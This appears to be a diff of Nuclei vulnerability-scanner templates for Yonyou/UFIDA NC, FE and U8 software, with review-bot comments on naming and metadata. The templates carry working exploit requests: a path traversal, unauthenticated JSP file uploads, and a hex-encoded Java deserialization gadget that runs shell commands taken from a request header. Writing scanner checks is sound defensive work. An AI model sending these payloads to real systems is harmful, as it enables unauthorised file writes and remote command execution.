@@ -1,34 +1,32 @@ id: yonyou-fe-directory-traversal info: - name: yonyou-fe-directory-traversal + name: FE collaborative Office templateOfTaohong_manager.jsp - Path Traversal author: SleepingBag945 severity: medium - description: 用友 FE协作办公平台 templateOfTaohong_manager.jsp文件存在目录遍历漏洞,通过漏洞攻击者可以获取目录文件等信息,导致进一步攻击 + description: | + There is a directory traversal vulnerability in the templateOfTaohong_manager.jsp file of UFIDA FE collaborative office platform. Through the vulnerability, attackers can obtain directory files and other information, leading to further attacks. reference: - - http://wiki.peiqi.tech/wiki/oa/%E7%94%A8%E5%8F%8BOA/%E7%94%A8%E5%8F%8B%20FE%E5%8D%8F%E4%BD%9C%E5%8A%9E%E5%85%AC%E5%B9%B3%E5%8F%B0%20templateOfTaohong_manager.jsp%20%E7%9B%AE%E5%BD%95%E9%81%8D%E5%8E%86%E6%BC%8F%E6%B4%9E.html - tags: yonyou + - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/oa/%E7%94%A8%E5%8F%8BOA/%E7%94%A8%E5%8F%8B%20FE%E5%8D%8F%E4%BD%9C%E5%8A%9E%E5%85%AC%E5%B9%B3%E5%8F%B0%20templateOfTaohong_manager.jsp%20%E7%9B%AE%E5%BD%95%E9%81%8D%E5%8E%86%E6%BC%8F%E6%B4%9E.md + metadata: + max-request: 2 + fofa-query: "FE协作" + verified: true + tags: yonyou,fe,lfi http: - - raw: - - | - GET /system/mediafile/templateOfTaohong_manager.jsp?path=/../../../ HTTP/1.1 - Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36 - Accept: */* - Cookie: JSESSIONID=31DB4A83640B082DBA62A54ADB04D77C - Accept-Encoding: gzip - - + - method: GET + path: + - "{{BaseURL}}/system/mediafile/templateOfTaohong_manager.jsp?path=/../../../" matchers-condition: and matchers: - type: word words: - "window.location=\"templateOfTaohong_manager.jsp?path=\"" - - type: word - words: - "var next=window.confirm(\"确定删除文件吗?\");" + condition: and + - type: status status: - 200 \ No newline at end of file 
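Review bot: `max-request: 2` is wrong for the new body: the raw request was replaced by a single `- method: GET` with one `path`, so it should be `max-request: 1`. The `condition: and` added to the remaining word matcher applies to a one-entry `words` list (the second word matcher with the `window.confirm` string was deleted), so it is redundant; drop it, or fold that string back in if it was meant to stay. `name: FE collaborative Office templateOfTaohong_manager.jsp - Path Traversal` has inconsistent capitalisation (`FE Collaborative Office`), and since the page lists directory contents rather than reading a file, check whether `lfi` is the tag you want.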
diff --git a/http/vulnerabilities/yonyou/yonyou-nc-accept-arbitrary-file-upload.yaml b/http/vulnerabilities/yonyou/yonyou-nc-accept-fileupload.yaml similarity index 67% rename from http/vulnerabilities/yonyou/yonyou-nc-accept-arbitrary-file-upload.yaml rename to http/vulnerabilities/yonyou/yonyou-nc-accept-fileupload.yaml index 07994cca95..6c272f87c7 100755 --- a/http/vulnerabilities/yonyou/yonyou-nc-accept-arbitrary-file-upload.yaml +++ b/http/vulnerabilities/yonyou/yonyou-nc-accept-fileupload.yaml @@ -1,20 +1,25 @@ -id: yonyou-nc-accept-arbitrary-file-upload +id: yonyou-nc-accept-fileupload info: - name: yonyou-nc-accept-arbitrary-file-upload + name: YonYou NC Accept Upload - Arbitray File Upload author: SleepingBag945 severity: critical - description: 用友NC在accept.jsp文件处存在任意文件上传漏洞。 + description: | + Arbitrary file upload vulnerability in UFIDA N C accept.jsp . An attacker can obtain website permissions through the vulnerability. reference: - http://wiki.peiqi.tech/wiki/oa/%E7%94%A8%E5%8F%8BOA/%E7%94%A8%E5%8F%8B%20GRP-U8%20Proxy%20SQL%E6%B3%A8%E5%85%A5%20CNNVD-201610-923.html - tags: yonyou + - https://mp.weixin.qq.com/s?__biz=MzkyMTMwNjU1Mg==&chksm=c184c6a1f6f34fb788437557f0e7708c74b16928e5973772db09b12067f10cf28b108701f67a&idx=1&lang=zh_CN&mid=2247488118&sn=16217c422eafc656df5fcacee9aa2153&token=857848930#rd + metadata: + max-request: 2 + fofa-query: icon_hash="1085941792" + verified: true + tags: yonyou,nc,intrusive,fileupload http: - raw: - | POST /aim/equipmap/accept.jsp HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36 Accept: */* Content-Type: multipart/form-data; boundary=---------------------------16314487820932200903769468567 Accept-Encoding: gzip 
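Review bot: The new `name` contains a typo, `Arbitray File Upload`, and the description reads `UFIDA N C accept.jsp .` with a split product name and a space before the full stop; use `YonYou NC Accept Upload - Arbitrary File Upload` and `Arbitrary file upload vulnerability in UFIDA NC accept.jsp. An attacker can obtain website permissions through the vulnerability.` The first `reference` entry, kept from the old file, is a PeiQi page about GRP-U8 Proxy SQL injection (CNNVD-201610-923), which does not appear to describe this accept.jsp upload; verify it or drop it. The `- raw:` request block continues past the end of this hunk.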
@@ -33,20 +38,13 @@ http: - | GET /{{randstr_3}}.jsp HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36 - Accept: */* Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip - req-condition: true matchers: - type: dsl dsl: - "status_code_1 == 200" - "status_code_2 == 200 && contains(body_2,'{{randstr_2}}')" - condition: and - - - -# 可尝试启动并调用xpcmdshell执行命令 \ No newline at end of file + condition: and \ No newline at end of file diff --git a/http/vulnerabilities/yonyou/yonyou-nc-baseapp-uploadservlet-deserialization-rce.yaml b/http/vulnerabilities/yonyou/yonyou-nc-baseapp-deserialization.yaml similarity index 66% rename from http/vulnerabilities/yonyou/yonyou-nc-baseapp-uploadservlet-deserialization-rce.yaml rename to http/vulnerabilities/yonyou/yonyou-nc-baseapp-deserialization.yaml index 0a9270d27f..35cd23cd7d 100755 --- a/http/vulnerabilities/yonyou/yonyou-nc-baseapp-uploadservlet-deserialization-rce.yaml +++ b/http/vulnerabilities/yonyou/yonyou-nc-baseapp-deserialization.yaml 
@@ -1,22 +1,26 @@ -id: yonyou-nc-baseapp-uploadservlet-deserialization-rce +id: yonyou-nc-baseapp-deserialization info: - name: Yonyou NC BaseApp UploadServlet Deserialization RCE + name: Yonyou NC BaseApp UploadServlet - Deserialization Detect author: SleepingBag945 - severity: critical + severity: high description: | Yonyou NC is an enterprise-level management software, widely used in large and medium-sized enterprises.Realize modeling, development, inheritance, operation, management integration of IT solution information platform.UFIDA NC for C/S architecture, the use of Java programming language development, the client can directly use UClient, the server interface for HTTP.A page of UFIDA NC6.5, there is arbitrary file upload vulnerability.The cause of vulnerability is that there is no type restriction at the uploading file, and an attacker without authentication can take advantage of this vulnerability by sending special data packets to the target system, and a remote attacker who successfully takes advantage of this vulnerability can upload any file to the target system to execute commands. - tags: rce + reference: + - https://github.com/cqr-cryeye-forks/goby-pocs/blob/main/Yonyou-NC-BaseApp-UploadServlet-Deserialization-RCE.json + metadata: + max-request: 1 + fofa-query: app="Yonyou-UFIDA-NC" + verified: true + tags: yonyou,nc,fileupload,baseapp,deserialization http: - - raw: - - | - GET /service/~baseapp/UploadServlet HTTP/1.1 - Host: {{Hostname}} - + - method: GET + path: + - "{{BaseURL}}/service/~baseapp/UploadServlet" matchers: - type: dsl dsl: - 'status_code_1 == 200 && contains(body_1,"java.io")' - condition: and + condition: and \ No newline at end of file 
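Review bot: The template now calls itself `Deserialization Detect` at severity `high`, but the new tags `fileupload,baseapp,deserialization` and the unchanged description (arbitrary file upload leading to command execution) still describe exploitation, while the only evidence gathered is `status_code_1 == 200 && contains(body_1,"java.io")` from an unauthenticated GET to `/service/~baseapp/UploadServlet`. Either state in `description` that this is an exposure check for the servlet rather than a confirmed upload/RCE, or keep tags and severity in line with a detection. The `condition: and` under a single-expression `dsl` list is redundant.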
diff --git a/http/vulnerabilities/yonyou/yonyou-nc-dispatcher-servlet-arbitrary-file-upload.yaml b/http/vulnerabilities/yonyou/yonyou-nc-dispatcher-fileupload.yaml similarity index 73% rename from http/vulnerabilities/yonyou/yonyou-nc-dispatcher-servlet-arbitrary-file-upload.yaml rename to http/vulnerabilities/yonyou/yonyou-nc-dispatcher-fileupload.yaml index d814725950..e0948aa60f 100755 --- a/http/vulnerabilities/yonyou/yonyou-nc-dispatcher-servlet-arbitrary-file-upload.yaml +++ b/http/vulnerabilities/yonyou/yonyou-nc-dispatcher-fileupload.yaml @@ -1,33 +1,36 @@ -id: yonyou-nc-dispatcher-servlet-arbitrary-file-upload +id: yonyou-nc-dispatcher-fileupload info: - name: Yonyou-NC ServiceDispatcherServlet Arbitrary File Upload + name: Yonyou NC ServiceDispatcher Servlet - Arbitrary File Upload author: SleepingBag945 severity: critical - description: Yonyou-NC FileReceiveServlet Arbitrary File Upload - tags: yonyou,nc + description: | + Yonyou NC ServiceDispatcherServlet deserialization file upload vulnerability. + reference: + - https://github.com/lal0ne/vulnerability/blob/c0985107adfd91d85fbd76d9a8acf8fbfa98ed41/YonyouNC/ncDecode/README.md + metadata: + fofa-query: icon_hash="1085941792" + verified: true + tags: yonyou,nc,intrusive http: - raw: - | POST /ServiceDispatcherServlet HTTP/1.1 - User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 2.0.50727; Media Center PC 6.0) Content-Type: application/data Host: {{Hostname}} Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 {{hex_decode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}} - - | GET /ncupload/n2d19a.jsp HTTP/1.1 Host: {{Hostname}} - matchers-condition: and matchers: - type: dsl dsl: - "status_code_1 == 200" - "status_code_2 == 200 && contains(body_2,'just_a_test')" - condition: and + condition: and \ No newline at end of file 
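Review bot: `metadata` has `fofa-query` and `verified` but no `max-request: 2`, although the template sends two raw requests and the sibling templates in this commit all set it. The new `description`, `Yonyou NC ServiceDispatcherServlet deserialization file upload vulnerability.`, is a fragment rather than a sentence; say what an attacker gains, as the other descriptions do. The second request fetches the fixed path `/ncupload/n2d19a.jsp`, so the artefact name written by the serialized payload is constant across scans; since the template is tagged `intrusive`, that is worth stating in the description so operators know what to clean up.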
diff --git a/http/vulnerabilities/yonyou/yonyou-nc-filereceiveservlet-arbitrary-file-upload.yaml b/http/vulnerabilities/yonyou/yonyou-nc-filereceiveservlet-arbitrary-file-upload.yaml deleted file mode 100755 index 9ed15f65c3..0000000000 --- a/http/vulnerabilities/yonyou/yonyou-nc-filereceiveservlet-arbitrary-file-upload.yaml +++ /dev/null @@ -1,33 +0,0 @@ -id: yonyou-nc-filereceiveservlet-arbitrary-file-upload - -info: - name: Yonyou NC FileReceiveServlet Aribitrary File Upload - author: bjxsec - severity: high - tags: yonyou,oa,bjxsec,yonyouoa - description: fofa app="用友-UFIDA-NC" "/platform/yonyou-yyy.js" -variables: - file_name: "{{to_lower(rand_text_alpha(8))}}.jsp" - file_content: "{{to_lower(rand_text_alpha(26))}}" -http: - - raw: - - | - POST /servlet/FileReceiveServlet HTTP/1.1 - Host: {{Hostname}} - User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 - Content-Type: multipart/form-data; - Referer: https://google.com - - {{hex_decode("ACED0005737200116A6176612E7574696C2E486173684D61700507DAC1C31660D103000246000A6C6F6164466163746F724900097468726573686F6C6478703F4000000000000C7708000000100000000274000946494C455F4E414D45740009")}}t00ls.jsp{{hex_decode("7400105441524745545F46494C455F504154487400102E2F776562617070732F6E635F77656278")}}{{file_content}} - - | - GET /t00ls.jsp HTTP/1.1 - Content-Type: application/x-www-form-urlencoded - Host: {{Hostname}} - - req-condition: true - matchers: - - type: dsl - dsl: - - "contains(body_2, '{{file_content}}')" - - "status_code_1 == 200 && status_code_2 == 200" - condition: and \ No newline at end of file diff --git a/http/vulnerabilities/yonyou/yonyou-nc-filereceiveservlet-fileupload..yaml b/http/vulnerabilities/yonyou/yonyou-nc-filereceiveservlet-fileupload..yaml new file mode 100755 index 0000000000..2ffe88dd33 --- /dev/null +++ b/http/vulnerabilities/yonyou/yonyou-nc-filereceiveservlet-fileupload..yaml 
@@ -0,0 +1,41 @@ +id: yonyou-nc-filereceiveservlet-fileupload + +info: + name: Yonyou NC FileReceiveServlet - Aribitrary File Upload + author: bjxsec + severity: critical + description: | + An unauthorized attacker can upload a file via the FileReceiveServlet endpoint. + reference: + - https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/yonyou-nc-arbitrary-file-upload.yaml + metadata: + max-request: 1 + fofa-query: app="用友-UFIDA-NC" + verified: true + tags: yonyou,nc,fileupload,intrusive + +variables: + file_name: "{{to_upper(rand_text_alphanumeric(5))}}.jsp" + file_content: "{{randstr}}" + +http: + - raw: + - | + POST /servlet/FileReceiveServlet HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; + + {{hex_decode("ACED0005737200116A6176612E7574696C2E486173684D61700507DAC1C31660D103000246000A6C6F6164466163746F724900097468726573686F6C6478703F4000000000000C7708000000100000000274000946494C455F4E414D45740009")}}{{file_name}}{{hex_decode("7400105441524745545F46494C455F504154487400102E2F776562617070732F6E635F77656278")}}{{file_content}} + + - | + GET /{{file_name}} HTTP/1.1 + Content-Type: application/x-www-form-urlencoded + Host: {{Hostname}} + + req-condition: true + matchers: + - type: dsl + dsl: + - "status_code_1 == 200 && status_code_2 == 200" + - "contains(body_2, '{{file_content}}')" + condition: and \ No newline at end of file diff --git a/http/vulnerabilities/yonyou/yonyou-nc-grouptemplet-file-upload.yaml b/http/vulnerabilities/yonyou/yonyou-nc-grouptemplet-fileupload.yaml similarity index 66% rename from http/vulnerabilities/yonyou/yonyou-nc-grouptemplet-file-upload.yaml rename to http/vulnerabilities/yonyou/yonyou-nc-grouptemplet-fileupload.yaml index 14892e8603..192ab5ea24 100755 --- a/http/vulnerabilities/yonyou/yonyou-nc-grouptemplet-file-upload.yaml +++ b/http/vulnerabilities/yonyou/yonyou-nc-grouptemplet-fileupload.yaml 
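Review bot: `max-request: 1` in the new `metadata` block is wrong: the template sends two raw requests (the POST to `/servlet/FileReceiveServlet` and the GET for `/{{file_name}}`), so it should read `max-request: 2`, as the NCMessageServlet template in this commit does for its two requests. The file is also created at `http/vulnerabilities/yonyou/yonyou-nc-filereceiveservlet-fileupload..yaml` with a doubled dot before the extension, which looks unintended, and `name:` carries the misspelling `Aribitrary` over from the deleted template; I would write `name: Yonyou NC FileReceiveServlet - Arbitrary File Upload`. Replacing the old fixed `t00ls.jsp` with `{{file_name}}` and `{{randstr}}` is the right direction; the description should still state that the check writes a JSP into the web application directory (the hex-encoded map appears to name a target path under `./webapps/`) and that the file is not removed afterwards.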
@@ -1,13 +1,19 @@ -id: yonyou-nc-grouptemplet-file-upload +id: yonyou-nc-grouptemplet-fileupload info: - name: yonyou-nc-grouptemplet-file-upload + name: UFIDA NC Grouptemplet Interface - Unauthenticated File Upload author: SleepingBag945 severity: critical - description: 用友NC任意文件上传 + description: | + The UFIDA NC Grouptemplet Interface permits unauthenticated users to upload potentially malicious files. reference: - https://www.seebug.org/vuldb/ssvid-99547 - tags: yonyou + - https://github.com/Augensternyu/POC-bomber/blob/main/pocs/redteam/yongyou_nc_fileupload_2022.py + metadata: + max-request: 2 + fofa-query: app="用友-UFIDA-NC + verified: true + tags: yonyou,nc,intrusive variables: v1: "{{rand_int(1,100)}}" @@ -29,7 +35,7 @@ http: - | GET /uapim/static/pages/{{v1}}/head.jsp HTTP/1.1 Host: {{Hostname}} - + matchers-condition: and matchers: - type: dsl diff --git a/http/vulnerabilities/yonyou/yonyou-nc-ncmessageservlet-rce.yaml b/http/vulnerabilities/yonyou/yonyou-nc-ncmessageservlet-rce.yaml index 1e9f7f67a8..4ad07a32fd 100644 --- a/http/vulnerabilities/yonyou/yonyou-nc-ncmessageservlet-rce.yaml +++ b/http/vulnerabilities/yonyou/yonyou-nc-ncmessageservlet-rce.yaml 
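Review bot: The added `fofa-query: app="用友-UFIDA-NC` is missing its closing double quote, so the stored query is unbalanced; it should be `fofa-query: app="用友-UFIDA-NC"`, matching the value the new FileReceiveServlet template uses. The same unterminated value is added in the `yonyou-nc-ncmessageservlet-rce.yaml` hunk of this commit. YAML reads the line as an ordinary plain scalar, so neither yamllint nor the template loader will flag it; only a consumer of the query string would notice.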
@@ -1,22 +1,28 @@ id: yonyou-nc-ncmessageservlet-rce info: - name: 用友NC NCMessageServlet反序列化漏洞 + name: UFIDA NC NCMessageServlet - Deserialization RCE Detect author: SleepingBag945 severity: critical - description: 用友NC在处理客户端请求数据的过程中。在反序列化用户提供的数据时,没有足够的检查和过滤,可能导致恶意的反序列化操作,在操作系统上执行命令。安全研究员经过分析后,发现该系统存在反序列化的利用点较多。目前在官方公开漏洞修复方案为对已知利用点进行反序列化白名单控制,以及对部分利用链依赖进行修复。导致该系统后续出现类似问题的可能性依旧较大。 - tags: yonyou,rce + description: | + UFIDA NC is in the process of processing client request data. Insufficient checking and filtering when deserializing user-supplied data can lead to malicious deserialization operations and execution of commands on the operating system. After analysis, security researchers found that the system has many exploit points for deserialization. Currently, the official vulnerability fix plan is to perform deserialization whitelist control on known exploit points and repair some exploit chain dependencies. The possibility of similar problems occurring in the system in the future is still high. + reference: + - https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/yonyou-nc-ncmessageservlet-rce.yaml + metadata: + max-request: 2 + fofa-query: app="用友-UFIDA-NC + verified: true + tags: yonyou,rce,deserialization,nc http: - raw: - | POST /servlet/~baseapp/nc.message.bs.NCMessageServlet HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 Content-Type: multipart/form-data; X-T0KEN-INF0: set /A 987843129+808922377 Accept-Encoding: gzip, deflate - + {{hex_decode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}} - | 
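Review bot: The new `description` is a translated background paragraph and still does not say how this template detects the issue, which a reader needs in order to interpret the matchers. I would append a sentence to the block along the lines of `The template sends two serialized payloads that evaluate the arithmetic expression given in the X-T0KEN-INF0 request header (set /A for Windows, expr for Linux) and matches on the base64-encoded sum returned in the X-T0KEN response header.`; the embedded class in the second payload visibly reads that header, runs it through `cmd.exe`/`/bin/sh` by `os.name`, and sets `X-T0KEN`. That also makes clear why `max-request: 2` is correct and why `name:` says "Detect" rather than claiming exploitation. The first raw request of this hunk continues into the next hunk.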
@@ -26,19 +32,13 @@ http: Content-Type: multipart/form-data; X-T0KEN-INF0: expr 987843129+808922376 Accept-Encoding: gzip, deflate - + {{hex_decode('ACED0005737200116A6176612E7574696C2E486173684D61700507DAC1C31660D103000246000A6C6F6164466163746F724900097468726573686F6C6478703F4000000000000C77080000001000000001737200346F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6B657976616C75652E546965644D6170456E7472798AADD29B39C11FDB0200024C00036B65797400124C6A6176612F6C616E672F4F626A6563743B4C00036D617074000F4C6A6176612F7574696C2F4D61703B78707400007372002A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6D61702E4C617A794D61706EE594829E7910940300014C0007666163746F727974002C4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436861696E65645472616E73666F726D657230C797EC287A97040200015B000D695472616E73666F726D65727374002D5B4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707572002D5B4C6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E5472616E73666F726D65723BBD562AF1D83418990200007870000000027372003B6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436F6E7374616E745472616E73666F726D6572587690114102B1940200014C000969436F6E7374616E7471007E0003787076720037636F6D2E73756E2E6F72672E6170616368652E78616C616E2E696E7465726E616C2E78736C74632E747261782E5472415846696C746572000000000000000000000078707372003E6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E496E7374616E74696174655472616E73666F726D6572348BF47FA486D03B0200025B000569417267737400135B4C6A6176612F6C616E672F4F626A6563743B5B000B69506172616D54797065737400125B4C6A6176612F6C616E672F436C6173733B7870757200135B4C6A6176612E6C616E672E4F626A6563743B90CE589F1073296C020000787000000001737200296F72672E6170616368652E78616C616E2E78736C74632E747261782E54656D706C61746573496D706C09574FC16EACA
B3303000749000D5F696E64656E744E756D62657249000E5F7472616E736C6574496E6465784C000B5F617578436C617373657374002A4C6F72672F6170616368652F78616C616E2F78736C74632F72756E74696D652F486173687461626C653B5B000A5F62797465636F6465737400035B5B425B00065F636C61737371007E00154C00055F6E616D657400124C6A6176612F6C616E672F537472696E673B4C00115F6F757470757450726F706572746965737400164C6A6176612F7574696C2F50726F706572746965733B787000000000FFFFFFFF70757200035B5B424BFD19156767DB37020000787000000001757200025B42ACF317F8060854E0020000787000000EF1CAFEBABE0000003200E30A0003000F0700DE0700120100063C696E69743E010003282956010004436F646501000F4C696E654E756D6265725461626C650100124C6F63616C5661726961626C655461626C6501000474686973010013537475625472616E736C65745061796C6F616401000C496E6E6572436C61737365730100354C79736F73657269616C2F7061796C6F6164732F7574696C2F4761646765747324537475625472616E736C65745061796C6F61643B01000A536F7572636546696C6501000C476164676574732E6A6176610C0004000507001301003379736F73657269616C2F7061796C6F6164732F7574696C2F4761646765747324537475625472616E736C65745061796C6F61640100106A6176612F6C616E672F4F626A65637401001F79736F73657269616C2F7061796C6F6164732F7574696C2F476164676574730100083C636C696E69743E0100106A6176612F6C616E672F54687265616407001501000D63757272656E7454687265616401001428294C6A6176612F6C616E672F5468726561643B0C001700180A0016001901000E67657454687265616447726F757001001928294C6A6176612F6C616E672F54687265616447726F75703B0C001B001C0A0016001D010008676574436C61737301001328294C6A6176612F6C616E672F436C6173733B0C001F00200A000300210100077468726561647308002301000F6A6176612F6C616E672F436C6173730700250100106765744465636C617265644669656C6401002D284C6A6176612F6C616E672F537472696E673B294C6A6176612F6C616E672F7265666C6563742F4669656C643B0C002700280A002600290100226A6176612F6C616E672F7265666C6563742F41636365737369626C654F626A65637407002B01000D73657441636365737369626C65010004285A29560C002D002E0A002C002F0100176A6176612F6C616E672F7265666C6563742F4669656C64070031010003676574010026284C6A6176612F6C616E672
F4F626A6563743B294C6A6176612F6C616E672F4F626A6563743B0C003300340A003200350100135B4C6A6176612F6C616E672F5468726561643B0700370100076765744E616D6501001428294C6A6176612F6C616E672F537472696E673B0C0039003A0A0016003B0100046578656308003D0100106A6176612F6C616E672F537472696E6707003F010008636F6E7461696E7301001B284C6A6176612F6C616E672F4368617253657175656E63653B295A0C004100420A00400043010004687474700800450100067461726765740800470100126A6176612F6C616E672F52756E6E61626C6507004901000674686973243008004B01000768616E646C657208004D01001E6A6176612F6C616E672F4E6F537563684669656C64457863657074696F6E07004F01000D6765745375706572636C6173730C005100200A00260052010006676C6F62616C08005401000A70726F636573736F727308005601000E6A6176612F7574696C2F4C69737407005801000473697A650100032829490C005A005B0B0059005C0100152849294C6A6176612F6C616E672F4F626A6563743B0C0033005E0B0059005F01000372657108006101000B676574526573706F6E73650800630100096765744D6574686F64010040284C6A6176612F6C616E672F537472696E673B5B4C6A6176612F6C616E672F436C6173733B294C6A6176612F6C616E672F7265666C6563742F4D6574686F643B0C006500660A002600670100186A6176612F6C616E672F7265666C6563742F4D6574686F64070069010006696E766F6B65010039284C6A6176612F6C616E672F4F626A6563743B5B4C6A6176612F6C616E672F4F626A6563743B294C6A6176612F6C616E672F4F626A6563743B0C006B006C0A006A006D01000967657448656164657208006F01000C582D54304B454E2D494E46300800710100076973456D70747901000328295A0C007300740A004000750100097365745374617475730800770100116A6176612F6C616E672F496E7465676572070079010004545950450100114C6A6176612F6C616E672F436C6173733B0C007B007C09007A007D010004284929560C0004007F0A007A00800100076F732E6E616D650800820100106A6176612F6C616E672F53797374656D07008401000B67657450726F7065727479010026284C6A6176612F6C616E672F537472696E673B294C6A6176612F6C616E672F537472696E673B0C008600870A0085008801000B746F4C6F776572436173650C008A003A0A0040008B01000677696E646F7708008D010007636D642E65786508008F0100022F630800910100072F62696E2F73680800930100022D630800950100116A6176612F7574696C2F5363616E6E6572070
0970100186A6176612F6C616E672F50726F636573734275696C646572070099010016285B4C6A6176612F6C616E672F537472696E673B29560C0004009B0A009A009C010005737461727401001528294C6A6176612F6C616E672F50726F636573733B0C009E009F0A009A00A00100116A6176612F6C616E672F50726F636573730700A201000E676574496E70757453747265616D01001728294C6A6176612F696F2F496E70757453747265616D3B0C00A400A50A00A300A6010018284C6A6176612F696F2F496E70757453747265616D3B29560C000400A80A009800A90100025C410800AB01000C75736544656C696D69746572010027284C6A6176612F6C616E672F537472696E673B294C6A6176612F7574696C2F5363616E6E65723B0C00AD00AE0A009800AF0100046E6578740C00B1003A0A009800B2010008676574427974657301000428295B420C00B400B50A004000B601002A6F72672E6170616368652E746F6D6361742E7574696C2E636F6465632E62696E6172792E4261736536340800B8010007666F724E616D65010025284C6A6176612F6C616E672F537472696E673B294C6A6176612F6C616E672F436C6173733B0C00BA00BB0A002600BC01000C656E636F64654261736536340800BE0100025B420700C00100097365744865616465720800C2010007582D54304B454E0800C4010015284C6A6176612F6C616E672F537472696E673B29560C000400C60A004000C7010005285B4229560C000400C90A004000CA01001F6A6176612F6C616E672F4E6F537563684D6574686F64457863657074696F6E0700CC0100136A6176612E6E696F2E427974654275666665720800CE010004777261700800D00100116765744465636C617265644D6574686F640C00D200660A002600D3010007646F57726974650800D50100136A6176612F6C616E672F457863657074696F6E0700D70100156A6176612F6C616E672F54687265616447726F75700700D90100135B4C6A6176612F6C616E672F537472696E673B0700DB01000D537461636B4D61705461626C6501001F79736F73657269616C2F50776E6572323235373930313132353233373432340100214C79736F73657269616C2F50776E6572323235373930313132353233373432343B01002F6F72672F6170616368652F78616C616E2F78736C74632F72756E74696D652F41627374726163745472616E736C65740700E00A00E1000F0021000200E1000000000002000100040005000100060000002F00010001000000052AB700E2B10000000200070000000600010000003500080000000C000100000005000900DF0000000800140005000100060000043A000A00190000031BA70003014C033DB8001AB6001E4
E2DB600221224B6002A3A04190404B6003019042DB60036C000383A0503360615061905BEA202E019051506323A07190701A60006A702CA1907B6003C3A081908123EB600449A000D19081246B600449A0006A702AC1907B600221248B6002A3A04190404B6003019041907B600363A091909C1004A9A0006A702861909B60022124CB6002A3A04190404B6003019041909B600363A091909B60022124EB6002A3A04A7001A3A0A1909B60022B60053B60053124EB6002A3A04A70003190404B6003019041909B600363A091909B60022B600531255B6002A3A04A700143A0B1909B600221255B6002A3A04A70003190404B6003019041909B600363A091909B600221257B6002A3A04190404B6003019041909B60036C000593A0C03360D150D190CB9005D0100A201C5190C150DB9006002003A0E190EB600221262B6002A3A04190404B600301904190EB600363A0F190FB60022126403BD0026B60068190F03BD0003B6006E3A10190FB60022127004BD00265903124053B60068190F04BD00035903127253B6006EC000403A08190801A5000B1908B60076990006A701421910B60022127804BD00265903B2007E53B60068191004BD00035903BB007A591100C8B7008153B6006E571283B80089B6008C128EB6004499001906BD0040590312905359041292535905190853A7001606BD00405903129453590412965359051908533A11BB009859BB009A591911B7009DB600A1B600A7B700AA12ACB600B0B600B3B600B73A1212B9B800BD3A13191312BF04BD0026590312C153B600680104BD00035903191253B6006E3A141910B6002212C305BD002659031240535904124053B60068191005BD00035903BB00405912C5B700C8535904BB0040591914C000C1B700CB53B6006E57A700513A1512CFB800BD3A16191612D104BD0026590312C153B600D4191604BD00035903191253B6006E3A091910B6002212D604BD00265903191653B60068191004BD00035903190953B6006E57A70003043D1C990006A70009840D01A7FE351C990006A70014A7000B3A17A70006A70000840601A7FD1EA700083A18A70003B1000500A400B000B3005000D900E800EB00500237029A029D00CD00350301030400D800050312031500D8000100DD000000E5001B03FF002900070005010700DA070032070038010000FC0017070016FC001A07004002FC002507000369070050166007005010FF002F000E0005010700DA070032070038010700160700400700030000070059010000FE007E07000307000307000302FB0050520700DCFF008A00130005010700DA070032070038010700160700400700030000070059010700030700030700030700DC0700C100010700CDFB004DF9000106F80
00506FF000200070005010700DA0700320700380100010700D804FF000200070005010700DA07003207003801000005FF00020002000500010700D8040002000D00000002000E000B0000000A000100020010000A00097074000450776E727077010078757200125B4C6A6176612E6C616E672E436C6173733BAB16D7AECBCD5A990200007870000000017672001D6A617661782E786D6C2E7472616E73666F726D2E54656D706C61746573000000000000000000000078707371007E00003F4000000000000077080000001000000000787871007E000678')}} - - stop-at-first-match: true matchers: - type: dsl dsl: - 'status_code_1 == 200 && contains(header_1,"X-T0ken") && contains(header_1,"MTc5Njc2NTUwNg==")' - 'status_code_2 == 200 && contains(header_2,"X-T0ken") && contains(header_2,"MTc5Njc2NTUwNQ==")' - condition: or - - - -# 利用直接改头部 \ No newline at end of file + condition: or \ No newline at end of file diff --git a/http/vulnerabilities/yonyou/yonyou-u8-crm-getemaildata-file-read.yaml b/http/vulnerabilities/yonyou/yonyou-u8-crm-getemaildata-file-read.yaml deleted file mode 100644 index 08ac1655b3..0000000000 --- a/http/vulnerabilities/yonyou/yonyou-u8-crm-getemaildata-file-read.yaml +++ /dev/null @@ -1,23 +0,0 @@ -id: yonyou-u8-crm-getemaildata-file-read - -info: - name: 用友U8-CRM getemaildata 任意文件读取 - author: SleepingBag945 - severity: high - description: | - 用友 U8 CRM客户关系管理系统 getemaildata.php 文件存在任意文件读取漏洞 - metadata: - tags: yonyou - -http: - - raw: - - | - POST 